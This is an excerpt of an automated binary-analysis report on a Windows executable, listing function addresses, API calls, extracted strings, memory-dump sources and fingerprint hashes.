• Opcode ID: c40a7030b3d53e4e9b87a62c9b74c04810048f342e3782ac6fe2ec1ba0146418
• Instruction ID: 2fb12d689ec714ac9dd689cc18539adb3c3af748d9c1c0cbd22b3caf518b20f1
• Opcode Fuzzy Hash: c40a7030b3d53e4e9b87a62c9b74c04810048f342e3782ac6fe2ec1ba0146418
• Instruction Fuzzy Hash: 53215CB4940208EFDB20DFA4DCC8EAABBBCEB45345F108479F446D2250DB74AE84CB25
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __sopen_s
• String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                                                                                                                                • API String ID: 2693426323-1656882147
                                                                                                                                                • Opcode ID: 8e8c74975080f7586b63864f13058e3d038b84c678b82ca6f12493de93a9ac56
                                                                                                                                                • Instruction ID: aee8d32a10fc81a569d3d0f89df44b7290bd0d0fa66e8397671c8021ecd751e8
                                                                                                                                                • Opcode Fuzzy Hash: 8e8c74975080f7586b63864f13058e3d038b84c678b82ca6f12493de93a9ac56
                                                                                                                                                • Instruction Fuzzy Hash: 4771C0B1804249EEEF14CF65C4467AA7FA4AB01314F24C17FE855D6261D3BDCE4A8F8A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __mtinitlocknum.LIBCMT ref: 004A4548
                                                                                                                                                  • Part of subcall function 00499D78: __FF_MSGBANNER.LIBCMT ref: 00499D94
                                                                                                                                                • __lock.LIBCMT ref: 004A455C
                                                                                                                                                • __lock.LIBCMT ref: 004A45A5
                                                                                                                                                • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004A45C0
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000115,00500580,00000018,004A7B7B,00000109,00000000,00000000), ref: 004A45E6
                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000115), ref: 004A45F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection__lock$CountCritEnterInitLeaveSpin___crt__mtinitlocknum
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2236623020-0
                                                                                                                                                • Opcode ID: 16288d5d8e1b583d407033526fac1ce6db200be079829911def2eb2cc772eee3
                                                                                                                                                • Instruction ID: 7a80893970b20621454f6715ebba4b43c28b54dddb025f6a903ad8d929293821
                                                                                                                                                • Opcode Fuzzy Hash: 16288d5d8e1b583d407033526fac1ce6db200be079829911def2eb2cc772eee3
                                                                                                                                                • Instruction Fuzzy Hash: B941D531D007069BDB249F69D8457AE7BE0AFE3324F14821EE122962D1CBBC99818B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041621D
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004162A1
                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000001,?), ref: 004162D0
                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000001,?), ref: 004162FF
                                                                                                                                                  • Part of subcall function 004112D8: MultiByteToWideChar.KERNEL32(?,00000000,AYA,000000FF,?,00000001,00415941,00000000,00000001,004C555A,?,?,?,?,?), ref: 004112F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$ByteCharH_prologMultiWide_malloc
                                                                                                                                                • String ID: name$path
                                                                                                                                                • API String ID: 124735866-3269492902
                                                                                                                                                • Opcode ID: 953cd90c2ff49b05e2939c8810fcf699e975528252ac066a9b16590229944e88
                                                                                                                                                • Instruction ID: ab7f9b131b277d0288684c74194887842d9b7ef69a1e277874c61d9958d353c5
                                                                                                                                                • Opcode Fuzzy Hash: 953cd90c2ff49b05e2939c8810fcf699e975528252ac066a9b16590229944e88
                                                                                                                                                • Instruction Fuzzy Hash: 1531A332900109ABCB01ABA9C8429FEBA75EB44354F25452BE910E7291D73ACD81DB89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041636B
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004163EF
                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000001,?), ref: 0041641E
                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000001,?), ref: 0041644D
                                                                                                                                                  • Part of subcall function 004112D8: MultiByteToWideChar.KERNEL32(?,00000000,AYA,000000FF,?,00000001,00415941,00000000,00000001,004C555A,?,?,?,?,?), ref: 004112F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$ByteCharH_prologMultiWide_malloc
                                                                                                                                                • String ID: name$path
                                                                                                                                                • API String ID: 124735866-3269492902
                                                                                                                                                • Opcode ID: 2b1379dd941fd9a3c2835b26950df1fdb94fd1a7bc5ff9ead382658d454331d1
                                                                                                                                                • Instruction ID: e956cf8bee30bc6acae8370fa1abac9b18f57f61ee8bfbe267f64a5198a38653
                                                                                                                                                • Opcode Fuzzy Hash: 2b1379dd941fd9a3c2835b26950df1fdb94fd1a7bc5ff9ead382658d454331d1
                                                                                                                                                • Instruction Fuzzy Hash: FB31D332900108ABCB11AFA9C842AFEBA75EF44314F21452BE814E7291DA39DD919BCD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004026ED
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000), ref: 00402710
                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0040272B
                                                                                                                                                • CharNextW.USER32(00000000,?,00000000), ref: 00402751
                                                                                                                                                • CharNextW.USER32(?,00000000,?,00000000), ref: 00402772
                                                                                                                                                • CoTaskMemFree.OLE32(?,?,00000000), ref: 00402790
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharFreeNextTask$H_prologlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3222259607-0
                                                                                                                                                • Opcode ID: fd582510c98aa593ae9e700a5ab6423728ab93496bda3429df7b88ccdd9ddc15
                                                                                                                                                • Instruction ID: bf85d203292337b042d4c94f44cf534f8756a145e100ead1a4606b81971c466e
                                                                                                                                                • Opcode Fuzzy Hash: fd582510c98aa593ae9e700a5ab6423728ab93496bda3429df7b88ccdd9ddc15
                                                                                                                                                • Instruction Fuzzy Hash: 0B415F76900216DBCB11AF64CE49A6E77B4EF05301B10817BE811FB2D1DBF889418BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFileIcmp
                                                                                                                                                • String ID: Data Buffer
                                                                                                                                                • API String ID: 232071827-3400854472
                                                                                                                                                • Opcode ID: d746ae784caf847b719b4c7cdc92ccc1d04de4fbd3f642302f1c398549c91646
                                                                                                                                                • Instruction ID: 2c2064d82b25bd1a76943e088142f16c9c597893a75f35a44a72cb591e4f9e15
                                                                                                                                                • Opcode Fuzzy Hash: d746ae784caf847b719b4c7cdc92ccc1d04de4fbd3f642302f1c398549c91646
                                                                                                                                                • Instruction Fuzzy Hash: D621CFB1D00204AADF20BB65C845BEE7F649F4932DF10029BF914671C2CBBC9A86969D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

APIs
• TlsGetValue.KERNEL32(00000000,0049AE28), ref: 0049AD85
• TlsGetValue.KERNEL32(FFFFFFFF), ref: 0049AD9C
• GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0049ADB1
• GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0049ADCC
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Value$AddressHandleModuleProc
• String ID: DecodePointer$KERNEL32.DLL
• API String ID: 1929421221-629428536
• Opcode ID: 2d95c44aa3d27881ea6566f7c617da3120886c970fc5c6bce8f442c96740ad53
• Instruction ID: 73a17e3b1eaf2a9809db141c8d34a438ee437dde9e8d5138dee38852e7795d5d
• Opcode Fuzzy Hash: 2d95c44aa3d27881ea6566f7c617da3120886c970fc5c6bce8f442c96740ad53
• Instruction Fuzzy Hash: DDF036305402169BCF519B65DC08A5F3EA5AFC13917158276F804E2770DB29DC21D6DF
Uniqueness
Uniqueness Score: -1.00%

APIs
• TlsGetValue.KERNEL32(00000000,0049AD76,00000000,004A63D6,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD0E
• TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD25
• GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD3A
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0049AD55
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Value$AddressHandleModuleProc
• String ID: EncodePointer$KERNEL32.DLL
• API String ID: 1929421221-3682587211
• Opcode ID: c06ba28ce6c86742b292ae637f93359bffb58a2410e0317e15ba9f6db384d5e1
• Instruction ID: ce1f9e2141655c5ae5db363b91788a4ddc7115172e8f8301d67d0b652bf55fc6
• Opcode Fuzzy Hash: c06ba28ce6c86742b292ae637f93359bffb58a2410e0317e15ba9f6db384d5e1
• Instruction Fuzzy Hash: BCF036345002129FCF519B35DC0496B3EA5AF803567198676F814E2774DF39DC2196EB
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: 0123456789abcdefghijklmnopqrstuvwxyz$I32$I64
• API String ID: 0-3086653229
• Opcode ID: 48ac57508b9e6c6deee61415100b860767e301385a944e8f77466340bdccf7cd
• Instruction ID: 8fba09a66a334d1046ffd444c0243137d4f7dc4b3e43463888c95a80690acd47
• Opcode Fuzzy Hash: 48ac57508b9e6c6deee61415100b860767e301385a944e8f77466340bdccf7cd
• Instruction Fuzzy Hash: 2ED125B09082059FDF298F68C9843FDBFA4EB91345F38446BD8029A351E27D9A42C779
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00409249
• std::_Lockit::_Lockit.LIBCPMT ref: 00409257
• int.LIBCPMT ref: 0040926B
  • Part of subcall function 00409863: std::_Lockit::_Lockit.LIBCPMT ref: 00409874
• std::locale::_Getfacet.LIBCPMT ref: 00409274
• std::locale::facet::_Incref.LIBCPMT ref: 004092B4
• std::locale::facet::facet_Register.LIBCPMT ref: 004092BA
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: LockitLockit::_std::_$GetfacetH_prologIncrefRegisterstd::locale::_std::locale::facet::_std::locale::facet::facet_
• String ID:
• API String ID: 2848266727-0
• Opcode ID: 23762ea35e17f83e5c552cc9c37cbfe370356b100d98c109c67e083404f261ee
• Instruction ID: 5043784a341471ba4da959a1efb30117f5b4d039450a2b1e4c6d649368ed0357
• Opcode Fuzzy Hash: 23762ea35e17f83e5c552cc9c37cbfe370356b100d98c109c67e083404f261ee
• Instruction Fuzzy Hash: DA010876D11110ABCB15F7B58805BAF76659B81728F10486FE501B73C2DFBC8E00C7A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004092E1
• std::_Lockit::_Lockit.LIBCPMT ref: 004092EF
• int.LIBCPMT ref: 00409303
  • Part of subcall function 00409863: std::_Lockit::_Lockit.LIBCPMT ref: 00409874
• std::locale::_Getfacet.LIBCPMT ref: 0040930C
• std::locale::facet::_Incref.LIBCPMT ref: 0040934C
• std::locale::facet::facet_Register.LIBCPMT ref: 00409352
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: LockitLockit::_std::_$GetfacetH_prologIncrefRegisterstd::locale::_std::locale::facet::_std::locale::facet::facet_
• String ID:
• API String ID: 2848266727-0
• Opcode ID: 1e0163ef9d3a86da92d0a39292cea92f8fcaea656e645db185ef67a431ae8b70
• Instruction ID: 452a4e61c8eeeaf4e7bda13df7f9f7fe56f98771c523bc610969419e47b73206
• Opcode Fuzzy Hash: 1e0163ef9d3a86da92d0a39292cea92f8fcaea656e645db185ef67a431ae8b70
• Instruction Fuzzy Hash: A5012632D11214A7CB15F7758815BEF77659B98724F10843FA901B73C2CFB88E408BA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041A0D6
  • Part of subcall function 00405CD7: __EH_prolog.LIBCMT ref: 00405CDC
  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock
• String ID: Accept: */*$Content-Type: application/octet-stream$User-Agent: Mozilla/4.0$|P
• API String ID: 464301166-4034774671
• Opcode ID: 7337e8693bb96f069e2e79f5ff6619a1613c970956e0d84039c88d998df1931e
• Instruction ID: 4bf59cb0fc79dd3851a5fa270df984cab4f9c93f93970c299ee4cb5a4f327154
• Opcode Fuzzy Hash: 7337e8693bb96f069e2e79f5ff6619a1613c970956e0d84039c88d998df1931e
• Instruction Fuzzy Hash: 7D918371D01109ABCF10AFA5DC81ADEB7B5EF15318F24442FF508A7282D7389A948B9A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog
• String ID: <?xml$encoding$standalone$version
• API String ID: 3519838083-3104461930
• Opcode ID: e1b05c928d83795cb652359756639be448774c991ad85cd97e1bdca898154a39
• Instruction ID: 2258cf4d849ae44b5bf630d7963306d98d0b461547a494992f80259597af88af
• Opcode Fuzzy Hash: e1b05c928d83795cb652359756639be448774c991ad85cd97e1bdca898154a39
• Instruction Fuzzy Hash: 95519D31A00308DBDF14EFA48881AAE7769AF45358F14426FF905772C2DB799C52CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00416594
• _strlen.LIBCMT ref: 00416608
• _memset.LIBCMT ref: 0041668D
  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
• lstrlenA.KERNEL32(?,00000000), ref: 00416727
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock_memset_strlenlstrlen
• String ID: |P
• API String ID: 3244084352-2149487505
• Opcode ID: f7389c9f386a0a9a3d822dadc89e323cceae152a326e855a94f2cc3289318d61
• Instruction ID: a7d56ad7aa5f8079aea8a59c918f6686988215481b4cf93ae64ad073ead828d0
• Opcode Fuzzy Hash: f7389c9f386a0a9a3d822dadc89e323cceae152a326e855a94f2cc3289318d61
• Instruction Fuzzy Hash: 2151C1319001199BCF10EFA9CC45AEEB7B5FF45308F15452BE425F3291DB3899868B68
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00418C85
  • Part of subcall function 0040E8C0: __EH_prolog.LIBCMT ref: 0040E8C5
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog
• String ID: Accept: */*$Content-Type: application/octet-stream$User-Agent: Mozilla/4.0$|P
• API String ID: 3519838083-4034774671
• Opcode ID: 2f767b29a77a4ee4541d6a3b1de1078e8f295ca33c1d53f8d5896643ef295631
• Instruction ID: e65918c3c3da1d16f129a06aaf14bc247454c0d2b62a1db5c5a02e3f995a7bab
• Opcode Fuzzy Hash: 2f767b29a77a4ee4541d6a3b1de1078e8f295ca33c1d53f8d5896643ef295631
• Instruction Fuzzy Hash: 2551A572D00205AACF20BFA59CC2ADE77A5EF55718F14042FF604B7282DB7D4A858B99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strncmp
